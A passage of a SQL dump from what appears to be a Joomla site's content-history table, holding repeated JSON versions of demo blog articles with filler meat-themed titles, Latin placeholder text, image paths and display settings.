\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"video\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"http:\\\\\\/\\\\\\/vimeo.com\\\\\\/43426940\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(16,73,1,'','2015-02-02 20:37:50',692,3008,'460756e5114f53fbad57d5f6ae16e526d075d1d6','{\"id\":73,\"asset_id\":197,\"title\":\"Jerky shank chicken boudin (2)\",\"alias\":\"jerky-shank-chicken-boudin-2\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>\\u00a0<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:31:45\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(17,73,1,'','2015-02-02 20:41:37',692,3036,'98e5d3dc541496f3f246af84a9202acdb7bd8a73','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Leberkas tail swine pork\",\"alias\":\"leberkas-tail-swine-pork\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>\\u00a0<\\/p>\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:41:37\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:41:31\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"1\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(18,73,1,'','2015-02-02 20:41:44',692,3018,'a4b8c473d3b20bf02900c7dc1e0ceb2b34933c53','{\"id\":73,\"asset_id\":\"197\",\"title\":\"Leberkas tail swine pork\",\"alias\":\"leberkas-tail-swine-pork\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:41:44\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:41:39\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":3,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"1\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(19,72,1,'','2015-02-02 20:41:51',692,2997,'d7d89e0f2bdb0473656ea2c99972bce38c9f5863','{\"id\":72,\"asset_id\":\"196\",\"title\":\"Jerky shank chicken boudin\",\"alias\":\"jerky-shank-chicken-boudin\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:41:51\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:41:46\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"video\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"http:\\\\\\/\\\\\\/vimeo.com\\\\\\/43426940\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":4,\"ordering\":\"1\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(20,74,1,'','2015-02-02 20:45:07',692,2998,'93efe9629942027e6326ea1e2a9b0de9e6839399','{\"id\":74,\"asset_id\":198,\"title\":\"Meatball kevin beef ribs shoulder\",\"alias\":\"meatball-kevin-beef-ribs-shoulder\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":0,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:41:44\",\"modified_by\":null,\"checked_out\":null,\"checked_out_time\":null,\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"standard\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":1,\"ordering\":null,\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":null,\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(21,74,1,'','2015-02-02 20:45:19',692,3035,'7423ef48e031b34fa2aeadc7ce2c862b53df4f2c','{\"id\":74,\"asset_id\":\"198\",\"title\":\"Meatball kevin beef ribs shoulder\",\"alias\":\"meatball-kevin-beef-ribs-shoulder\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:45:19\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:45:11\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 00:00:00\",\"images\":\"{\\\"image_intro\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_intro\\\":\\\"\\\",\\\"image_intro_alt\\\":\\\"\\\",\\\"image_intro_caption\\\":\\\"\\\",\\\"image_fulltext\\\":\\\"images\\\\\\/blog\\\\\\/blog01.jpg\\\",\\\"float_fulltext\\\":\\\"\\\",\\\"image_fulltext_alt\\\":\\\"\\\",\\\"image_fulltext_caption\\\":\\\"\\\"}\",\"urls\":\"{\\\"urla\\\":false,\\\"urlatext\\\":\\\"\\\",\\\"targeta\\\":\\\"\\\",\\\"urlb\\\":false,\\\"urlbtext\\\":\\\"\\\",\\\"targetb\\\":\\\"\\\",\\\"urlc\\\":false,\\\"urlctext\\\":\\\"\\\",\\\"targetc\\\":\\\"\\\"}\",\"attribs\":\"{\\\"show_title\\\":\\\"\\\",\\\"link_titles\\\":\\\"\\\",\\\"show_tags\\\":\\\"\\\",\\\"show_intro\\\":\\\"\\\",\\\"info_block_position\\\":\\\"\\\",\\\"show_category\\\":\\\"\\\",\\\"link_category\\\":\\\"\\\",\\\"show_parent_category\\\":\\\"\\\",\\\"link_parent_category\\\":\\\"\\\",\\\"show_author\\\":\\\"\\\",\\\"link_author\\\":\\\"\\\",\\\"show_create_date\\\":\\\"\\\",\\\"show_modify_date\\\":\\\"\\\",\\\"show_publish_date\\\":\\\"\\\",\\\"show_item_navigation\\\":\\\"\\\",\\\"show_icons\\\":\\\"\\\",\\\"show_print_icon\\\":\\\"\\\",\\\"show_email_icon\\\":\\\"\\\",\\\"show_vote\\\":\\\"\\\",\\\"show_hits\\\":\\\"\\\",\\\"show_noauth\\\":\\\"\\\",\\\"urls_position\\\":\\\"\\\",\\\"alternative_readmore\\\":\\\"\\\",\\\"article_layout\\\":\\\"\\\",\\\"show_publishing_options\\\":\\\"\\\",\\\"show_article_options\\\":\\\"\\\",\\\"show_urls_images_backend\\\":\\\"\\\",\\\"show_urls_images_frontend\\\":\\\"\\\",\\\"post_format\\\":\\\"gallery\\\",\\\"gallery\\\":\\\"\\\",\\\"audio\\\":\\\"\\\",\\\"video\\\":\\\"\\\",\\\"link_title\\\":\\\"\\\",\\\"link_url\\\":\\\"\\\",\\\"quote_text\\\":\\\"\\\",\\\"quote_author\\\":\\\"\\\",\\\"post_status\\\":\\\"\\\"}\",\"version\":2,\"ordering\":\"0\",\"metakey\":\"\",\"metadesc\":\"\",\"access\":\"1\",\"hits\":\"0\",\"metadata\":\"{\\\"robots\\\":\\\"\\\",\\\"author\\\":\\\"\\\",\\\"rights\\\":\\\"\\\",\\\"xreference\\\":\\\"\\\"}\",\"featured\":\"0\",\"language\":\"*\",\"xreference\":\"\"}',0),(22,74,1,'','2015-02-02 20:53:42',692,3116,'15f8fb6bb8f068b4c2ea6609839940990835bb91','{\"id\":74,\"asset_id\":\"198\",\"title\":\"Meatball kevin beef ribs shoulder\",\"alias\":\"meatball-kevin-beef-ribs-shoulder\",\"introtext\":\"<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo.<\\/p>\\r\\n\",\"fulltext\":\"\\r\\n<p>Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Vestibulum tortor quam, feugiat vitae, ultricies eget, tempor sit amet, ante. Donec eu libero sit amet quam egestas semper. Aenean ultricies mi vitae est. Mauris placerat eleifend leo. Quisque sit amet est et sapien ullamcorper pharetra. Vestibulum erat wisi, condimentum sed, commodo vitae, ornare sit amet, wisi. Aenean fermentum, elit eget tincidunt condimentum, eros ipsum rutrum orci, sagittis tempus lacus enim ac dui. Donec non enim in turpis pulvinar facilisis. Ut felis. Praesent dapibus, neque id cursus faucibus, tortor neque egestas augue, eu vulputate magna eros eu erat. Aliquam erat volutpat. Nam dui mi, tincidunt quis, accumsan porttitor, facilisis luctus, metus<\\/p>\",\"state\":1,\"catid\":\"79\",\"created\":\"2015-02-02 20:29:50\",\"created_by\":\"864\",\"created_by_alias\":\"\",\"modified\":\"2015-02-02 20:53:42\",\"modified_by\":\"864\",\"checked_out\":\"864\",\"checked_out_time\":\"2015-02-02 20:53:38\",\"publish_up\":\"2015-02-02 20:29:50\",\"publish_down\":\"0000-00-00 